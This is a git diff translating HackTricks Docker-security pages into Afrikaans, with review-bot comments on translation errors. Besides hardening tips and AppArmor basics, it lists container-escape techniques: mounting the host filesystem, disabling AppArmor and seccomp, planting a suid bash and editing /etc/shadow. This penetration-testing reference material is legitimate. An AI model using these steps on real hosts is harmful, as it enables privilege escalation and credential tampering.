It includes an [Open Container Initiative (OCI)](https://www.opencontainers.org) runtime called `runsc` that provides an **isolation boundary between the application and the host kernel**. The `runsc` runtime integrates with Docker and Kubernetes, making it simple to run sandboxed containers. +**gVisor** is 'n toepassingskernel, geskryf in Go, wat 'n groot gedeelte van die Linux-stelseloppervlak implementeer. Dit sluit 'n [Open Container Initiative (OCI)](https://www.opencontainers.org) runtime genaamd `runsc` in wat 'n **isolasiegrens tussen die toepassing en die gasheerkernel** voorsien. Die `runsc` runtime integreer met Docker en Kubernetes, wat dit eenvoudig maak om gesandbokte houers te hardloop. {% embed url="https://github.com/google/gvisor" %} ### Kata Containers -**Kata Containers** is an open source community working to build a secure container runtime with lightweight virtual machines that feel and perform like containers, but provide **stronger workload isolation using hardware virtualization** technology as a second layer of defense. +**Kata Containers** is 'n oopbron-gemeenskap wat werk aan die bou van 'n veilige houer-runtime met ligte virtuele masjiene wat soos houers voel en optree, maar **sterker werklas-isolasie bied deur middel van hardeware-virtualisering** as 'n tweede verdedigingslaag. {% embed url="https://katacontainers.io/" %} -### Summary Tips +### Opsomming van Wenke -* **Do not use the `--privileged` flag or mount a** [**Docker socket inside the container**](https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/)**.** The docker socket allows for spawning containers, so it is an easy way to take full control of the host, for example, by running another container with the `--privileged` flag. -* Do **not run as root inside the container. 
Use a** [**different user**](https://docs.docker.com/develop/develop-images/dockerfile\_best-practices/#user) **and** [**user namespaces**](https://docs.docker.com/engine/security/userns-remap/)**.** The root in the container is the same as on host unless remapped with user namespaces. It is only lightly restricted by, primarily, Linux namespaces, capabilities, and cgroups. -* [**Drop all capabilities**](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities) **(`--cap-drop=all`) and enable only those that are required** (`--cap-add=...`). Many of workloads don’t need any capabilities and adding them increases the scope of a potential attack. -* [**Use the “no-new-privileges” security option**](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/) to prevent processes from gaining more privileges, for example through suid binaries. -* [**Limit resources available to the container**](https://docs.docker.com/engine/reference/run/#runtime-constraints-on-resources)**.** Resource limits can protect the machine from denial of service attacks. -* **Adjust** [**seccomp**](https://docs.docker.com/engine/security/seccomp/)**,** [**AppArmor**](https://docs.docker.com/engine/security/apparmor/) **(or SELinux)** profiles to restrict the actions and syscalls available for the container to the minimum required. -* **Use** [**official docker images**](https://docs.docker.com/docker-hub/official\_images/) **and require signatures** or build your own based on them. Don’t inherit or use [backdoored](https://arstechnica.com/information-technology/2018/06/backdoored-images-downloaded-5-million-times-finally-removed-from-docker-hub/) images. Also store root keys, passphrase in a safe place. Docker has plans to manage keys with UCP. -* **Regularly** **rebuild** your images to **apply security patches to the host an images.** -* Manage your **secrets wisely** so it's difficult to the attacker to access them. 
-* If you **exposes the docker daemon use HTTPS** with client & server authentication. -* In your Dockerfile, **favor COPY instead of ADD**. ADD automatically extracts zipped files and can copy files from URLs. COPY doesn’t have these capabilities. Whenever possible, avoid using ADD so you aren’t susceptible to attacks through remote URLs and Zip files. -* Have **separate containers for each micro-s**ervice -* **Don’t put ssh** inside container, “docker exec” can be used to ssh to Container. -* Have **smaller** container **images** +* **Moenie die `--privileged` vlag gebruik of 'n** [**Docker-aansluiting binne die houer monteer**](https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/)**.** Die Docker-aansluiting maak dit moontlik om houers te skep, dus is dit 'n maklike manier om volle beheer oor die gasheer te verkry, byvoorbeeld deur 'n ander houer met die `--privileged` vlag te hardloop. +* Moenie **as root binne die houer hardloop nie. Gebruik 'n** [**ander gebruiker**](https://docs.docker.com/develop/develop-images/dockerfile\_best-practices/#user) **en** [**gebruikersnaamruimtes**](https://docs.docker.com/engine/security/userns-remap/)**.** Die root in die houer is dieselfde as op die gasheer tensy dit met gebruikersnaamruimtes herkartografeer word. Dit word slegs lig beperk deur Linux-naamruimtes, vermoëns en cgroups. +* [**Laat alle vermoëns vaar**](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities) **(`--cap-drop=all`) en aktiveer slegs dié wat benodig word** (`--cap-add=...`). Baie werklaste benodig geen vermoëns nie en die byvoeging daarvan verhoog die omvang van 'n potensiële aanval. +* [**Gebruik die "no-new-privileges" veiligheidsoptie**](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/) om te voorkom dat prosesse meer vermoëns bekom, byvoorbeeld deur suid-binêre lêers. 
+* [**Beperk die hulpbronne wat beskikbaar is vir die houer**](https://docs.docker.com/engine/reference/run/#runtime-constraints-on-resources)**.** Hulpbronbeperkings kan die masjien teen ontkenning-van-diens-aanvalle beskerm. +* **Pas** [**seccomp**](https://docs.docker.com/engine/security/seccomp/)**,** [**AppArmor**](https://docs.docker.com/engine/security/apparmor/) **(of SELinux)** profiele aan om die aksies en stelseloproepe wat vir die houer beskikbaar is, tot die minimum wat benodig word, te beperk. +* **Gebruik** [**amptelike Docker-beelde**](https://docs.docker.com/docker-hub/official\_images/) **en vereis handtekeninge** of bou jou eie beelde gebaseer daarop. Moenie beelde erf of gebruik wat [agterdeure](https://arstechnica.com/information-technology/2018/06/backdoored-images-downloaded-5-million-times-finally-removed-from-docker-hub/) bevat nie. Berg ook wortelsleutels en wagwoord op 'n veilige plek op. Docker het planne om sleutels met UCP te bestuur. +* **Herbou jou beelde gereeld** om sekuriteitsopdaterings op die gasheer en beelde toe te pas. +* Bestuur jou **geheime verstandig** sodat dit moeilik is vir die aanvaller om toegang daartoe te verkry. +* As jy die Docker-daeemon blootstel, gebruik **HTTPS** met klient- en bedienerverifikasie. +* In jou Dockerfile, **gee voorkeur aan KOPIËRE in plaas van TOEVOEGEN**. TOEVOEGEN onttrek outomaties saamgepersde lêers en kan lêers vanaf URL's kopieer. KOPIËRE het nie hierdie vermoëns nie. Vermy waar moontlik die gebruik van TOEVOEGEN sodat jy nie vatbaar is vir aanvalle deur middel van afgeleë URL's en Zip-lêers nie. +* Het **afsonderlike houers vir elke mikrodiens** +* **Moenie ssh** binne die houer plaas nie, "docker exec" kan gebruik word om na die houer ssh. 
+* Het **kleiner** houerbeelde -## Docker Breakout / Privilege Escalation +## Docker Uitbreek / Voorregverhoging -If you are **inside a docker container** or you have access to a user in the **docker group**, you could try to **escape and escalate privileges**: +As jy **binne 'n Docker-houer** is of toegang het tot 'n gebruiker in die **docker-groep**, kan jy probeer om **uit te breek en voorregte te verhoog**: {% content-ref url="docker-breakout-privilege-escalation/" %} [docker-breakout-privilege-escalation](docker-breakout-privilege-escalation/) {% endcontent-ref %} -## Docker Authentication Plugin Bypass +## Docker-verifikasieplugin-omseil -If you have access to the docker socket or have access to a user in the **docker group but your actions are being limited by a docker auth plugin**, check if you can **bypass it:** +As jy toegang het tot die Docker-aansluiting of toegang het tot 'n gebruiker in die **docker-groep, maar jou aksies word beperk deur 'n Docker-verifikasieplugin**, kyk of jy dit kan **omseil:** {% content-ref url="authz-and-authn-docker-access-authorization-plugin.md" %} [authz-and-authn-docker-access-authorization-plugin.md](authz-and-authn-docker-access-authorization-plugin.md) {% endcontent-ref %} -## Hardening Docker +## Verharding van Docker -* The tool [**docker-bench-security**](https://github.com/docker/docker-bench-security) is a script that checks for dozens of common best-practices around deploying Docker containers in production. The tests are all automated, and are based on the [CIS Docker Benchmark v1.3.1](https://www.cisecurity.org/benchmark/docker/).\ - You need to run the tool from the host running docker or from a container with enough privileges. Find out **how to run it in the README:** [**https://github.com/docker/docker-bench-security**](https://github.com/docker/docker-bench-security). 
+* Die gereedskap [**docker-bench-security**](https://github.com/docker/docker-bench-security) is 'n skrip wat tientalle algemene beste praktyke vir die implementering van Docker-houers in produksie nagaan. Die toetse is outomaties en is gebaseer op die [CIS Docker Benchmark v1.3.1](https://www.cisecurity.org/benchmark/docker/).\ +Jy moet die gereedskap vanaf die gasheer wat Docker hardloop, of vanaf 'n houer met genoeg voorregte, hardloop. Vind **hoe om dit in die README te hardloop:** [**https://github.com/docker/docker-bench-security**](https://github.com/docker/docker-bench-security). -## References +## Verwysings * [https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/) * [https://twitter.com/\_fel1x/status/1151487051986087936](https://twitter.com/\_fel1x/status/1151487051986087936) -* [https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html](https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html) -* [https://sreeninet.wordpress.com/2016/03/06/docker-security-part-1overview/](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-1overview/) -* [https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/) -* [https://sreeninet.wordpress.com/2016/03/06/docker-security-part-3engine-access/](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-3engine-access/) -* [https://sreeninet.wordpress.com/2016/03/06/docker-security-part-4container-image/](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-4container-image/) -* [https://en.wikipedia.org/wiki/Linux\_namespaces](https://en.wikipedia.org/wiki/Linux\_namespaces) -* [https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57](https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57) -* 
[https://www.redhat.com/sysadmin/privileged-flag-container-engines](https://www.redhat.com/sysadmin/privileged-flag-container-engines) -* [https://docs.docker.com/engine/extend/plugins_authorization](https://docs.docker.com/engine/extend/plugins_authorization) -* [https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57](https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57) -* [https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/](https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/) +* [https://ajxchapman.github.io/containers/2020/11/19/privileged-container +Ander maniere om HackTricks te ondersteun: -
- -\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
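Review bot: the Docker Compose example in this hunk is broken because its indentation was stripped: `+my_service:`, `+image: centos:7`, `+entrypoint: "cat /run/secrets/my_secret"` and `+- my_secret` now sit at column 0 under `services:`, so `my_service` is no longer a child of `services`, the service keys become top-level keys, and `secrets:` appears twice at the same level, which is invalid YAML. Restore the original two- and four-space nesting from the `-` lines. The hunk also inserts a second, invented Compose snippet (`myservice` / `mysecret` with `file: ./path/to/secret/file`) plus the sentence `In hierdie voorbeeld word 'n diens genaamd `myservice` gedefinieer ...`; neither is in the English source and both should be dropped. In the summary tips, `COPY` and `ADD` are Dockerfile instructions and must not be translated (`KOPIËRE`, `TOEVOEGEN`; the latter is Dutch rather than Afrikaans), and `Docker-daeemon` is a typo for `Docker-daemon`. "natively supported" has become `outomaties ondersteun` (automatically supported), which changes the claim about Kubernetes secrets. Finally the references section is truncated: `+* [https://ajxchapman.github.io/containers/2020/11/19/privileged-container` ends mid-URL with no closing bracket, and the `-` lines that follow (the four sreeninet posts, the Linux namespaces page, the towardsdatascience and experfy tips, the Red Hat `--privileged` article, the Docker `plugins_authorization` page, the Trickest banner and the `Learn AWS hacking from zero to hero with htARTE` line) are deleted without a translated counterpart. Keep the reference list intact and translate only the prose.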
diff --git a/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md b/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md index e96a571b4..d891ccc9f 100644 --- a/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md +++ b/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md @@ -1,57 +1,57 @@ -# Abusing Docker Socket for Privilege Escalation +# Misbruik van Docker Socket vir Voorregverhoging
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-There are some occasions were you just have **access to the docker socket** and you want to use it to **escalate privileges**. Some actions might be very suspicious and you may want to avoid them, so here you can find different flags that can be useful to escalate privileges: +Daar is soms geleenthede waar jy net **toegang het tot die Docker-socket** en dit wil gebruik om **voorregte te verhoog**. Sommige aksies kan baie verdag wees en jy wil dit dalk vermy, so hier kan jy verskillende vlae vind wat nuttig kan wees om voorregte te verhoog: -### Via mount +### Via berging -You can **mount** different parts of the **filesystem** in a container running as root and **access** them.\ -You could also **abuse a mount to escalate privileges** inside the container. +Jy kan verskillende dele van die **lêersisteem** in 'n houer wat as root loop **berg** en **toegang** daartoe verkry.\ +Jy kan ook **misbruik maak van 'n berging om voorregte te verhoog** binne die houer. -* **`-v /:/host`** -> Mount the host filesystem in the container so you can **read the host filesystem.** - * If you want to **feel like you are in the host** but being on the container you could disable other defense mechanisms using flags like: - * `--privileged` - * `--cap-add=ALL` - * `--security-opt apparmor=unconfined` - * `--security-opt seccomp=unconfined` - * `-security-opt label:disable` - * `--pid=host` - * `--userns=host` - * `--uts=host` - * `--cgroupns=host` -* \*\*`--device=/dev/sda1 --cap-add=SYS_ADMIN --security-opt apparmor=unconfined` \*\* -> This is similar to the previous method, but here we are **mounting the device disk**. Then, inside the container run `mount /dev/sda1 /mnt` and you can **access** the **host filesystem** in `/mnt` - * Run `fdisk -l` in the host to find the `` device to mount -* **`-v /tmp:/host`** -> If for some reason you can **just mount some directory** from the host and you have access inside the host. 
Mount it and create a **`/bin/bash`** with **suid** in the mounted directory so you can **execute it from the host and escalate to root**. +* **`-v /:/host`** -> Berg die gasheer-lêersisteem in die houer sodat jy die gasheer-lêersisteem kan **lees**. +* As jy wil **voel asof jy op die gasheer is**, maar in die houer is, kan jy ander verdedigingsmeganismes deaktiveer deur vlae soos die volgende te gebruik: +* `--privileged` +* `--cap-add=ALL` +* `--security-opt apparmor=unconfined` +* `--security-opt seccomp=unconfined` +* `-security-opt label:disable` +* `--pid=host` +* `--userns=host` +* `--uts=host` +* `--cgroupns=host` +* \*\*`--device=/dev/sda1 --cap-add=SYS_ADMIN --security-opt apparmor=unconfined` \*\* -> Dit is soortgelyk aan die vorige metode, maar hier **berg ons die toesteldisk**. Voer dan binne die houer `mount /dev/sda1 /mnt` uit en jy kan toegang verkry tot die **gasheer-lêersisteem** in `/mnt` +* Voer `fdisk -l` in die gasheer uit om die ``-toestel te vind om te berg +* **`-v /tmp:/host`** -> As jy om een ​​of ander rede net 'n sekere gids van die gasheer kan berg en jy toegang het binne die gasheer. Berg dit en skep 'n **`/bin/bash`** met **suid** in die gebergde gids sodat jy dit van die gasheer kan **uitvoer en na root kan verhoog**. {% hint style="info" %} -Note that maybe you cannot mount the folder `/tmp` but you can mount a **different writable folder**. You can find writable directories using: `find / -writable -type d 2>/dev/null` +Let daarop dat jy dalk nie die gids `/tmp` kan berg nie, maar jy kan 'n **verskillende skryfbare gids** berg. Jy kan skryfbare gidsies vind deur die volgende te gebruik: `find / -writable -type d 2>/dev/null` -**Note that not all the directories in a linux machine will support the suid bit!** In order to check which directories support the suid bit run `mount | grep -v "nosuid"` For example usually `/dev/shm` , `/run` , `/proc` , `/sys/fs/cgroup` and `/var/lib/lxcfs` don't support the suid bit. 
+**Let daarop dat nie al die gidse in 'n Linux-masjien die suid-bit sal ondersteun nie!** Om te bepaal watter gidse die suid-bit ondersteun, voer `mount | grep -v "nosuid"` uit. Byvoorbeeld, gewoonlik ondersteun `/dev/shm`, `/run`, `/proc`, `/sys/fs/cgroup` en `/var/lib/lxcfs` nie die suid-bit nie. -Note also that if you can **mount `/etc`** or any other folder **containing configuration files**, you may change them from the docker container as root in order to **abuse them in the host** and escalate privileges (maybe modifying `/etc/shadow`) +Let ook daarop dat as jy **`/etc`** of enige ander gids **wat konfigurasie-lêers bevat** kan berg, kan jy hulle vanuit die Docker-houer as root verander om hulle in die gasheer te **misbruik en voorregte te verhoog** (dalk deur `/etc/shadow` te wysig) {% endhint %} -### Escaping from the container +### Ontsnapping uit die houer -* **`--privileged`** -> With this flag you [remove all the isolation from the container](docker-privileged.md#what-affects). Check techniques to [escape from privileged containers as root](docker-breakout-privilege-escalation/#automatic-enumeration-and-escape). -* **`--cap-add= [--security-opt apparmor=unconfined] [--security-opt seccomp=unconfined] [-security-opt label:disable]`** -> To [escalate abusing capabilities](../linux-capabilities.md), **grant that capability to the container** and disable other protection methods that may prevent the exploit to work. +* **`--privileged`** -> Met hierdie vlag verwyder jy [alle isolasie uit die houer](docker-privileged.md#what-affects). Kyk na tegnieke om [uit bevoorregte houers as root te ontsnap](docker-breakout-privilege-escalation/#automatic-enumeration-and-escape). 
+* **`--cap-add= [--security-opt apparmor=unconfined] [--security-opt seccomp=unconfined] [-security-opt label:disable]`** -> Om [voorregte te verhoog deur gebruik te maak van funksies](../linux-capabilities.md), **verleen daardie funksie aan die houer** en deaktiveer ander beskermingsmetodes wat die uitbuiting kan voorkom. ### Curl -In this page we have discussed ways to escalate privileges using docker flags, you can find **ways to abuse these methods using curl** command in the page: +Op hierdie bladsy het ons maniere bespreek om voorregte te verhoog deur gebruik te maak van Docker-vlae, jy kan maniere vind om hierdie metodes te misbruik deur die curl-opdrag op die bladsy te gebruik: {% content-ref url="authz-and-authn-docker-access-authorization-plugin.md" %} [authz-and-authn-docker-access-authorization-plugin.md](authz-and-authn-docker-access-authorization-plugin.md) @@ -59,14 +59,14 @@ In this page we have discussed ways to escalate privileges using docker flags, y
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
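Review bot: the nested bullet structure under `-v /:/host` in abusing-docker-socket-for-privilege-escalation.md is lost in the translated lines: the original indented sub-bullets (`  * If you want to feel like you are in the host ...`, `    * --privileged`, `    * --cap-add=ALL`, ... `    * --cgroupns=host`, and `  * Run fdisk -l ...`) are re-emitted as top-level `+* ` items, so after this patch the isolation-disabling flags render as peer techniques of `-v /:/host` instead of as options for it. Please restore the two indentation levels. Other points in the same hunk: "Via berging" translates "mount" as storage, while apparmor.md in this same patch uses "monteer"; pick one term (monteer) and use it for both the heading and "berg/gebergde". "`**verleen daardie funksie aan die houer**`" renders Linux capabilities as "funksie", whereas apparmor.md uses "bevoegdheid" and "vermoë" for the same concept; standardise on one. "`om een ​​of ander rede`" contains stray zero-width characters between "een" and "of" that should be stripped, and "skryfbare gidsies" should read "skryfbare gidse". The single-dash `-security-opt label:disable` is carried over from the source; if the translation touches this list anyway, correcting it to `--security-opt label=disable` would be cheap. Finally, the header and footer hunks of this file leave "SUBSCRIPTION PLANS" untranslated while the previous file in this patch renders it as "SUBSKRIPSIEPLANNE"; make the boilerplate consistent across files.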
diff --git a/linux-hardening/privilege-escalation/docker-security/apparmor.md b/linux-hardening/privilege-escalation/docker-security/apparmor.md index e67d3add8..1e7378bb6 100644 --- a/linux-hardening/privilege-escalation/docker-security/apparmor.md +++ b/linux-hardening/privilege-escalation/docker-security/apparmor.md @@ -2,45 +2,44 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -AppArmor is a **kernel enhancement designed to restrict the resources available to programs through per-program profiles**, effectively implementing Mandatory Access Control (MAC) by tying access control attributes directly to programs instead of users. This system operates by **loading profiles into the kernel**, usually during boot, and these profiles dictate what resources a program can access, such as network connections, raw socket access, and file permissions. +AppArmor is 'n **kernel-verbetering wat ontwerp is om die hulpbronne wat beskikbaar is vir programme te beperk deur middel van per-program profiele**, wat effektief Verpligte Toegangsbeheer (MAC) implementeer deur toegangsbeheerkenmerke direk aan programme te koppel in plaas van aan gebruikers. Hierdie stelsel werk deur profiele in die kernel te laai, gewoonlik tydens opstart, en hierdie profiele bepaal watter hulpbronne 'n program kan benader, soos netwerkverbindinge, rou sokkeltoegang en lêertoestemmings. -There are two operational modes for AppArmor profiles: +Daar is twee bedryfsmodusse vir AppArmor-profiel: -- **Enforcement Mode**: This mode actively enforces the policies defined within the profile, blocking actions that violate these policies and logging any attempts to breach them through systems like syslog or auditd. -- **Complain Mode**: Unlike enforcement mode, complain mode does not block actions that go against the profile's policies. Instead, it logs these attempts as policy violations without enforcing restrictions. +- **Handhawingsmodus**: Hierdie modus dwing aktief die beleide wat binne die profiel gedefinieer is, deur aksies wat hierdie beleide oortree te blokkeer en enige pogings om dit te oortree deur stelsels soos syslog of auditd te log. +- **Klaagmodus**: In teenstelling met handhawingsmodus blokkeer klaagmodus nie aksies wat teen die beleide van die profiel ingaan nie. 
Dit log eerder hierdie pogings as beleidoortredings sonder om beperkings af te dwing. -### Components of AppArmor +### Komponente van AppArmor -- **Kernel Module**: Responsible for the enforcement of policies. -- **Policies**: Specify the rules and restrictions for program behavior and resource access. -- **Parser**: Loads policies into the kernel for enforcement or reporting. -- **Utilities**: These are user-mode programs that provide an interface for interacting with and managing AppArmor. +- **Kernelmodule**: Verantwoordelik vir die handhawing van beleide. +- **Beleide**: Spesifiseer die reëls en beperkings vir programgedrag en hulpbronbenadering. +- **Parser**: Laai beleide in die kernel vir handhawing of verslagdoening. +- **Hulpprogramme**: Dit is gebruikersmodusprogramme wat 'n koppelvlak bied vir interaksie met en bestuur van AppArmor. -### Profiles path +### Profielepad -Apparmor profiles are usually saved in _**/etc/apparmor.d/**_\ -With `sudo aa-status` you will be able to list the binaries that are restricted by some profile. If you can change the char "/" for a dot of the path of each listed binary and you will obtain the name of the apparmor profile inside the mentioned folder. +AppArmor-profiel word gewoonlik gestoor in _**/etc/apparmor.d/**_\ +Met `sudo aa-status` kan jy die bineêre lyste wat deur 'n profiel beperk word, lys. As jy die karakter "/" kan verander na 'n punt van die pad van elke gelysde bineêre lêer, sal jy die naam van die apparmor-profiel binne die genoemde vouer verkry. 
-For example, a **apparmor** profile for _/usr/bin/man_ will be located in _/etc/apparmor.d/usr.bin.man_ - -### Commands +Byvoorbeeld, 'n **apparmor**-profiel vir _/usr/bin/man_ sal geleë wees in _/etc/apparmor.d/usr.bin.man_ +### Opdragte ```bash -aa-status #check the current status +aa-status #check the current status aa-enforce #set profile to enforce mode (from disable or complain) aa-complain #set profile to complain mode (from diable or enforcement) apparmor_parser #to load/reload an altered policy 
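Review bot: "`Met sudo aa-status kan jy die bineêre lyste wat deur 'n profiel beperk word, lys`" mistranslates "list the binaries that are restricted by some profile" as "list the binary lists"; it should be "die binêre lêers ... lys". In the same hunk "Daar is twee bedryfsmodusse vir AppArmor-profiel" needs the plural "AppArmor-profiele", the spelling alternates between "bineêre" and "binêre", and "vouer" here versus "gids" elsewhere in the patch should be unified. The blank line that separated the _/etc/apparmor.d/usr.bin.man_ sentence from the `### Opdragte` heading was dropped (`+... _/etc/apparmor.d/usr.bin.man_ +### Opdragte`); keep the blank line so the heading is not glued to the paragraph in the raw markdown.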
